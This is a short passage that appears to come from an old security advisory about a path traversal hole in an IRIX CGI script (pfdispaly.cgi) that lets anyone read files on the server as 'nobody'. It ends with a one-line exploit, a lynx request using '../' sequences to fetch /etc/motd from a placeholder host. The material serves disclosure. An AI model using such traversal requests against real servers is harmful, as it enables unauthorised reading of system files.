J.A. Gutierrez found following.   If you do not remember  or don't
    know about the /cgi-bin/handler bug, take a look at 'httpd #4'  in
    IRIX section of Security Bugware.  Well, more of the same.  Anyone
    can read files (as 'nobody') from your system.  Exploit:

        lynx -source \
        'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'